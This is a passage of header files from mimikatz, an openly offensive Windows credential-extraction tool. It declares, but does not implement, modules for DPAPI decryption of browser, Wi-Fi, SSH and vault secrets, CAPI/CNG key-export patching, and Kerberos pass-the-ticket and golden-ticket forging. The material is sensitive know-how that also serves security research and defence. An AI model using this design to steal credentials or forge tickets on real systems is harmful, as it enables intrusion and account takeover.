23 | VALUE "InternalName", "mimikatz"
24 | VALUE "LegalCopyright", "Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)"
25 | VALUE "OriginalFilename", "mimikatz.exe"
26 | VALUE "PrivateBuild", "Build with love for POC only"
27 | VALUE "SpecialBuild", ":)"
28 | END
29 | END
30 | BLOCK "VarFileInfo"
31 | BEGIN
32 | VALUE "Translation", 0x0409, 1200
33 | END
34 | END
35 |
36 | 100 ICON "mimikatz.ico"
--------------------------------------------------------------------------------
/mimikatz/modules/crypto/kuhl_m_crypto_patch.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m.h"
8 | #include "../../../modules/kull_m_patch.h"
9 | #include "../../../modules/kull_m_crypto.h"
10 |
11 | typedef BOOL (WINAPI * PCP_EXPORTKEY) (IN HCRYPTPROV hProv, IN HCRYPTKEY hKey, IN HCRYPTKEY hPubKey, IN DWORD dwBlobType, IN DWORD dwFlags, OUT LPBYTE pbData, IN OUT LPDWORD pcbDataLen);
12 | PCP_EXPORTKEY K_RSA_CPExportKey, K_DSS_CPExportKey;
13 |
14 | NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[]);
15 | NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/crypto/kuhl_m_crypto_pki.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m.h"
8 | #include "../../../modules/kull_m_string.h"
9 | #include "../../../modules/kull_m_crypto.h"//*_system.h"
10 | //#include "../kuhl_m_crypto.h"
11 |
12 | typedef struct _KIWI_KEY_INFO {
13 | CRYPT_KEY_PROV_INFO keyInfos;
14 | LPSTR pin;
15 | DWORD dwKeyFlags;
16 | WORD wKeySize;
17 | HCRYPTPROV hProv;
18 | } KIWI_KEY_INFO, *PKIWI_KEY_INFO;
19 |
20 | typedef struct _KIWI_CERT_INFO {
21 | LPFILETIME notbefore; // do NOT move
22 | LPFILETIME notafter; // do NOT move
23 | LPCWSTR cn;
24 | LPCWSTR ou;
25 | LPCWSTR o;
26 | LPCWSTR c;
27 | LPCWSTR sn;
28 | WORD ku;
29 | LPSTR algorithm;
30 | BOOL isAC;
31 | PCERT_EXTENSION eku;
32 | PCERT_EXTENSION san;
33 | PCERT_EXTENSION cdp;
34 | } KIWI_CERT_INFO, *PKIWI_CERT_INFO;
35 |
36 | typedef struct _KIWI_CRL_INFO {
37 | LPFILETIME thisupdate; // do NOT move
38 | LPFILETIME nextupdate; // do NOT move
39 | LPSTR algorithm;
40 | int crlnumber;
41 | // ...
42 | } KIWI_CRL_INFO, *PKIWI_CRL_INFO;
43 |
44 | typedef struct _KIWI_SIGNER {
45 | HCRYPTPROV_OR_NCRYPT_KEY_HANDLE hProv;
46 | DWORD dwKeySpec;
47 | FILETIME NotBefore;
48 | FILETIME NotAfter;
49 | CERT_NAME_BLOB Subject;
50 | } KIWI_SIGNER, *PKIWI_SIGNER;
51 |
52 | PWSTR kuhl_m_crypto_pki_getCertificateName(PCERT_NAME_BLOB blob);
53 |
54 | NTSTATUS kuhl_m_crypto_c_sc_auth(int argc, wchar_t * argv[]);
55 | BOOL kuhl_m_crypto_c_sc_auth_quickEncode(__in LPCSTR lpszStructType, __in const void *pvStructInfo, PDATA_BLOB data);
--------------------------------------------------------------------------------
/mimikatz/modules/crypto/kuhl_m_crypto_sc.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_crypto.h"
8 | #include <cardmod.h>
9 | //#include "../../../modules/kull_m_crypto.h"
10 |
11 | NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[]);
12 |
13 | void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHANDLE hScard, LPCWSTR szModel, LPCBYTE pbAtr, DWORD cbAtr);
14 | DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider);
15 | PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/kuhl_m_dpapi.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "../kuhl_m.h"
9 | #include "../modules/kull_m_file.h"
10 | #include "../modules/kull_m_dpapi.h"
11 |
12 | #include "kuhl_m_dpapi_oe.h"
13 | #include "packages/kuhl_m_dpapi_keys.h"
14 | #include "packages/kuhl_m_dpapi_creds.h"
15 | #include "packages/kuhl_m_dpapi_wlan.h"
16 | #include "packages/kuhl_m_dpapi_chrome.h"
17 | #include "packages/kuhl_m_dpapi_ssh.h"
18 | #include "packages/kuhl_m_dpapi_rdg.h"
19 | #include "packages/kuhl_m_dpapi_powershell.h"
20 | #include "packages/kuhl_m_dpapi_lunahsm.h"
21 | #include "packages/kuhl_m_dpapi_cloudap.h"
22 | #include "packages/kuhl_m_dpapi_sccm.h"
23 | #include "packages/kuhl_m_dpapi_citrix.h"
24 |
25 | const KUHL_M kuhl_m_dpapi;
26 |
27 | NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[]);
28 | NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]);
29 | NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]);
30 | NTSTATUS kuhl_m_dpapi_credhist(int argc, wchar_t * argv[]);
31 | NTSTATUS kuhl_m_dpapi_create(int argc, wchar_t * argv[]);
32 |
33 | BOOL kuhl_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInLen, LPWSTR *ppszDataDescr, int argc, wchar_t * argv[], LPCVOID pOptionalEntropy, DWORD dwOptionalEntropyLen, LPVOID *pDataOut, DWORD *dwDataOutLen, LPCWSTR pText);
34 | void kuhl_m_dpapi_display_MasterkeyInfosAndFree(LPCGUID guid, PVOID data, DWORD dataLen, PSID sid);
35 | void kuhl_m_dpapi_display_CredHist(PKULL_M_DPAPI_CREDHIST_ENTRY entry, LPCVOID ntlm, LPCVOID sha1);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../modules/sqlite3.h"
9 |
10 | NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[]);
11 | BOOL kuhl_m_dpapi_chrome_isTableExist(sqlite3 *pDb, const char *table);
12 | void kuhl_m_dpapi_chrome_decrypt(LPCVOID pData, DWORD dwData, BCRYPT_ALG_HANDLE hAlg, BCRYPT_KEY_HANDLE hKey, int argc, wchar_t * argv[], LPCWSTR type);
13 | void kuhl_m_dpapi_chrome_free_alg_key(BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
14 | BOOL kuhl_m_dpapi_chrome_alg_key_from_raw(BYTE key[AES_256_KEY_SIZE], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
15 | BOOL kuhl_m_dpapi_chrome_alg_key_from_b64(LPCWSTR base64, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
16 | BOOL kuhl_m_dpapi_chrome_alg_key_from_file(LPCWSTR szState, BOOL forced, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
17 | BOOL kuhl_m_dpapi_chrome_alg_key_from_auto(LPCWSTR szFile, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 |
9 | NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_cloudap.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../../../modules/kull_m_crypto_ngc.h"
9 | #include <time.h>
10 |
11 | NTSTATUS kuhl_m_dpapi_cloudap_keyvalue_derived(int argc, wchar_t * argv[]);
12 | NTSTATUS kuhl_m_dpapi_cloudap_fromreg(int argc, wchar_t * argv[]);
13 |
14 | PSTR generate_simpleHeader(PCSTR Alg, LPCBYTE Context, DWORD cbContext);
15 | PSTR generate_simplePayload(PCWSTR PrimaryRefreshToken, __time32_t *iat);
16 | PSTR generate_simpleSignature(LPCBYTE Context, DWORD cbContext, PCWSTR PrimaryRefreshToken, __time32_t *iat, LPCBYTE Key, DWORD cbKey, OPTIONAL LPCBYTE SeedLabel, OPTIONAL DWORD cbSeedLabel);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../modules/kull_m_cred.h"
9 | #include "../../sekurlsa/kuhl_m_sekurlsa.h"
10 |
11 | typedef struct _KUHL_M_DPAPI_ENCRYPTED_CRED {
12 | DWORD version;
13 | DWORD blobSize;
14 | DWORD unk;
15 | BYTE blob[ANYSIZE_ARRAY];
16 | } KUHL_M_DPAPI_ENCRYPTED_CRED, *PKUHL_M_DPAPI_ENCRYPTED_CRED;
17 |
18 | NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[]);
20 |
21 | void kuhl_m_dpapi_cred_tryEncrypted(LPCWSTR target, LPCBYTE data, DWORD dataLen, int argc, wchar_t * argv[]);
22 | BOOL kuhl_m_dpapi_vault_key_type(PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE attribute, HCRYPTPROV hProv, BYTE aes128[AES_128_KEY_SIZE], BYTE aes256[AES_256_KEY_SIZE], HCRYPTKEY *hKey, BOOL *isAttr);
23 | void kuhl_m_dpapi_vault_basic(PVOID data, DWORD size, GUID *schema);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_keys.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../kuhl_m_crypto.h"
9 | #include "../modules/kull_m_key.h"
10 |
11 | NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[]);
12 | NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[]);
13 | NTSTATUS kuhl_m_dpapi_keys_tpm(int argc, wchar_t * argv[]);
14 |
15 | void kuhl_m_dpapi_keys_tpm_descr(LPCVOID data, DWORD dwData);
16 |
17 | typedef struct _KUHL_M_DPAPI_KEYS_TPM_TLV {
18 | DWORD Tag;
19 | DWORD Length;
20 | BYTE Data[ANYSIZE_ARRAY];
21 | } KUHL_M_DPAPI_KEYS_TPM_TLV, *PKUHL_M_DPAPI_KEYS_TPM_TLV;
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_lunahsm.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 |
9 | NTSTATUS kuhl_m_dpapi_lunahsm(int argc, wchar_t * argv[]);
10 |
11 | void kuhl_m_dpapi_safenet_ksp_registryparser(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hBase, int argc, wchar_t * argv[]);
12 | void kuhl_m_dpapi_safenet_ksp_registry_user_parser(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hEntry, BYTE entropy[MD5_DIGEST_LENGTH], int argc, wchar_t * argv[]);
13 |
14 | void kuhl_m_dpapi_safenet_ksp_entropy(IN LPCSTR identity, OUT BYTE entropy[MD5_DIGEST_LENGTH]);
15 | LPSTR kuhl_m_dpapi_safenet_pk_password(IN LPCSTR server);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_powershell.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../../../modules/kull_m_xml.h"
9 |
10 | NTSTATUS kuhl_m_dpapi_powershell(int argc, wchar_t * argv[]);
11 |
12 | BOOL kuhl_m_dpapi_powershell_check_against_one_type(IXMLDOMNode *pObj, LPCWSTR TypeName);
13 | void kuhl_m_dpapi_powershell_try_SecureString(IXMLDOMNode *pObj, int argc, wchar_t * argv[]);
14 | void kuhl_m_dpapi_powershell_credential(IXMLDOMNode *pObj, int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_rdg.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../../../modules/kull_m_xml.h"
9 | #include "../../../../modules/kull_m_string.h"
10 |
11 | NTSTATUS kuhl_m_dpapi_rdg(int argc, wchar_t * argv[]);
12 |
13 | void kuhl_m_dpapi_rdg_CredentialsProfile(DWORD level, IXMLDOMNode *pNode, int argc, wchar_t * argv[]);
14 | void kuhl_m_dpapi_rdg_Groups(DWORD level, IXMLDOMNode *pNode, int argc, wchar_t * argv[]);
15 | void kuhl_m_dpapi_rdg_Servers(DWORD level, IXMLDOMNode *pNode, int argc, wchar_t * argv[]);
16 | void kuhl_m_dpapi_rdg_LogonCredentials(DWORD level, IXMLDOMNode *pNode, int argc, wchar_t * argv[]);
17 | void kuhl_m_dpapi_rdg_Credentials(DWORD level, IXMLDOMNode *pNode, int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../../../modules/kull_m_string.h"
9 | #include "../../../../modules/kull_m_crypto.h"
10 | #include <wbemidl.h>
11 |
12 | typedef struct _SCCM_Policy_Secret {
13 | DWORD cbData;
14 | BYTE data[ANYSIZE_ARRAY];
15 | } SCCM_Policy_Secret, *PSCCM_Policy_Secret;
16 |
17 | NTSTATUS kuhl_m_dpapi_sccm_networkaccessaccount(int argc, wchar_t * argv[]);
18 |
19 | BOOL kuhl_m_dpapi_sccm_XML_Data_to_bin(BSTR szData, PSCCM_Policy_Secret * ppPolicySecret, PDWORD pcbPolicySecret);
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_ssh.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../../../../modules/kull_m_registry.h"
9 | #include "../../kuhl_m_token.h"
10 |
11 | NTSTATUS kuhl_m_dpapi_ssh(int argc, wchar_t * argv[]);
12 |
13 | void kuhl_m_dpapi_ssh_keys4user(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hUser, LPCWSTR szSID, int argc, wchar_t * argv[]);
14 | BOOL CALLBACK kuhl_m_dpapi_ssh_impersonate(HANDLE hToken, DWORD ptid, PVOID pvArg);
15 | void kuhl_m_dpapi_ssh_getKey(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hEntry, int argc, wchar_t * argv[], HANDLE hToken);
16 | BOOL kuhl_m_dpapi_ssh_getRSAfromRAW(LPCBYTE data, DWORD szData);
17 | void kuhl_m_dpapi_ssh_ParseKeyElement(PBYTE *pRaw, PBYTE *pData, DWORD *pszData);
18 |
19 | typedef struct _KUHL_M_DPAPI_SSH_TOKEN{
20 | PSID pSid;
21 | HANDLE hToken;
22 | } KUHL_M_DPAPI_SSH_TOKEN, *PKUHL_M_DPAPI_SSH_TOKEN;
23 |
24 | /* Key types */
25 | enum sshkey_types {
26 | KEY_RSA,
27 | KEY_DSA,
28 | KEY_ECDSA,
29 | KEY_ED25519,
30 | KEY_RSA_CERT,
31 | KEY_DSA_CERT,
32 | KEY_ECDSA_CERT,
33 | KEY_ED25519_CERT,
34 | KEY_XMSS,
35 | KEY_XMSS_CERT,
36 | KEY_UNSPEC
37 | };
--------------------------------------------------------------------------------
/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_wlan.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 |
9 | NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[]);
10 | NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kerberos/kuhl_m_kerberos.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m.h"
8 | #include "../modules/kull_m_file.h"
9 | #include "../modules/kull_m_crypto_system.h"
10 | #include "kuhl_m_kerberos_ticket.h"
11 | #include "kuhl_m_kerberos_pac.h"
12 | #include "kuhl_m_kerberos_ccache.h"
13 |
14 | #define KRB_KEY_USAGE_AS_REP_TGS_REP 2
15 |
16 | typedef struct _KUHL_M_KERBEROS_LIFETIME_DATA {
17 | FILETIME TicketStart;
18 | FILETIME TicketEnd;
19 | FILETIME TicketRenew;
20 | } KUHL_M_KERBEROS_LIFETIME_DATA, *PKUHL_M_KERBEROS_LIFETIME_DATA;
21 |
22 | const KUHL_M kuhl_m_kerberos;
23 |
24 | NTSTATUS kuhl_m_kerberos_init();
25 | NTSTATUS kuhl_m_kerberos_clean();
26 |
27 | NTSTATUS LsaCallKerberosPackage(PVOID ProtocolSubmitBuffer, ULONG SubmitBufferLength, PVOID *ProtocolReturnBuffer, PULONG ReturnBufferLength, PNTSTATUS ProtocolStatus);
28 |
29 | NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[]);
30 | BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg);
31 | void kuhl_m_kerberos_ptt_file(PCWCHAR filename);
32 | NTSTATUS kuhl_m_kerberos_ptt_data(PVOID data, DWORD dataSize);
33 | NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[]);
34 | NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[]);
35 | NTSTATUS kuhl_m_kerberos_ask(int argc, wchar_t * argv[]);
36 | NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[]);
37 | NTSTATUS kuhl_m_kerberos_purge(int argc, wchar_t * argv[]);
38 | NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[]);
39 | NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
40 | NTSTATUS kuhl_m_kerberos_test(int argc, wchar_t * argv[]);
41 |
42 | NTSTATUS kuhl_m_kerberos_hash_data_raw(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count, PBYTE *buffer, DWORD *dwBuffer);
43 | NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pString, PCUNICODE_STRING pSalt, DWORD count);
44 | wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
45 | wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
46 | PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, LPCBYTE key, DWORD keySize, DWORD keyType, PISID sid, LPCWSTR LogonDomainName, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet);
47 | NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);
--------------------------------------------------------------------------------
/mimikatz/modules/kerberos/kuhl_m_kerberos_ccache.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m_kerberos.h"
8 | #include "../modules/kull_m_file.h"
9 |
10 | /* Info : https://www.gnu.org/software/shishi/manual/html_node/The-Credential-Cache-Binary-File-Format.html */
11 |
12 | NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave);
13 | NTSTATUS kuhl_m_kerberos_ccache_ptc(int argc, wchar_t * argv[]);
14 | NTSTATUS kuhl_m_kerberos_ccache_list(int argc, wchar_t * argv[]);
15 |
16 | void kuhl_m_kerberos_ccache_UnixTimeToFileTime(time_t t, LPFILETIME pft);
17 | BOOL kuhl_m_kerberos_ccache_unicode_string(PBYTE *data, PUNICODE_STRING ustring);
18 | BOOL kuhl_m_kerberos_ccache_externalname(PBYTE *data, PKERB_EXTERNAL_NAME * name, PUNICODE_STRING realm);
19 | void kuhl_m_kerberos_ccache_skip_buffer(PBYTE *data);
20 | void kuhl_m_kerberos_ccache_skip_struct_with_buffer(PBYTE *data);
21 | wchar_t * kuhl_m_kerberos_ccache_generateFileName(const DWORD index, PKIWI_KERBEROS_TICKET ticket, LPCWSTR ext);
--------------------------------------------------------------------------------
/mimikatz/modules/kerberos/kuhl_m_kerberos_claims.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../modules/rpc/kull_m_rpc_ms-claims.h"
8 |
9 | PCLAIMS_SET kuhl_m_kerberos_claims_createFromString(LPCWCHAR string);
10 | void kuhl_m_kerberos_claims_free(PCLAIMS_SET claimsSet);
11 | void kuhl_m_kerberos_claims_displayClaimsSet(PCLAIMS_SET claimsSet);
12 | BOOL kuhl_m_kerberos_claims_encode_ClaimsSet(PCLAIMS_SET claimsSet, PVOID *encoded, DWORD *dwEncoded);
--------------------------------------------------------------------------------
/mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m.h"
8 | #include "kuhl_m_kerberos_claims.h"
9 | #include "../modules/kull_m_file.h"
10 | #include "../modules/kull_m_crypto_system.h"
11 | #include "../modules/rpc/kull_m_rpc_ms-pac.h"
12 |
13 | #define DEFAULT_GROUP_ATTRIBUTES (SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED)
14 |
15 | #pragma pack(push, 4)
16 | typedef struct _PAC_SIGNATURE_DATA {
17 | LONG SignatureType;
18 | UCHAR Signature[ANYSIZE_ARRAY];// LM_NTLM_HASH_LENGTH];
19 | //USHORT RODCIdentifier;
20 | //USHORT Reserverd;
21 | } PAC_SIGNATURE_DATA, *PPAC_SIGNATURE_DATA;
22 | #pragma pack(pop)
23 |
24 | BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, PFILETIME authtime, LPCWSTR clientname, LONG SignatureType, PCLAIMS_SET pClaimsSet, PPACTYPE * pacType, DWORD * pacLength);
25 | BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PFILETIME authtime, LPCWSTR clientname, PPAC_CLIENT_INFO * pacClientInfo, DWORD * pacClientInfoLength);
26 | NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, LONG SignatureType, LPCVOID key, DWORD keySize);
27 | PKERB_VALIDATION_INFO kuhl_m_pac_infoToValidationInfo(PFILETIME authtime, LPCWSTR username, LPCWSTR domainname, LPCWSTR LogonDomainName, PISID sid, ULONG rid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids);
28 | BOOL kuhl_m_pac_stringToGroups(PCWSTR szGroups, PGROUP_MEMBERSHIP *groups, DWORD *cbGroups);
29 | BOOL kuhl_m_pac_stringToSids(PCWSTR szSids, PKERB_SID_AND_ATTRIBUTES *sids, DWORD *cbSids);
30 |
31 | #if defined(KERBEROS_TOOLS)
32 | NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[]);
33 | #endif
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | typedef NTSTATUS (* PKUHL_M_C_FUNC) (int argc, wchar_t * args[]);
10 | typedef NTSTATUS (* PKUHL_M_C_FUNC_INIT) ();
11 |
12 | typedef struct _KUHL_M_C {
13 | const PKUHL_M_C_FUNC pCommand;
14 | const wchar_t * command;
15 | const wchar_t * description;
16 | } KUHL_M_C, *PKUHL_M_C;
17 |
18 | typedef struct _KUHL_M {
19 | const wchar_t * shortName;
20 | const wchar_t * fullName;
21 | const wchar_t * description;
22 | const unsigned short nbCommands;
23 | const KUHL_M_C * commands;
24 | const PKUHL_M_C_FUNC_INIT pInit;
25 | const PKUHL_M_C_FUNC_INIT pClean;
26 | } KUHL_M, *PKUHL_M;
27 |
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_acr.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../../modules/kull_m_acr.h"
9 | #include "../../modules/kull_m_pn532.h"
10 |
11 | const KUHL_M kuhl_m_acr;
12 |
13 | NTSTATUS kuhl_m_acr_init();
14 | NTSTATUS kuhl_m_acr_clean();
15 |
16 | NTSTATUS kuhl_m_acr_open(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_acr_close(int argc, wchar_t * argv[]);
18 |
19 | NTSTATUS kuhl_m_acr_firmware(int argc, wchar_t * argv[]);
20 | NTSTATUS kuhl_m_acr_info(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/mimikatz/modules/kuhl_m_busylight.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
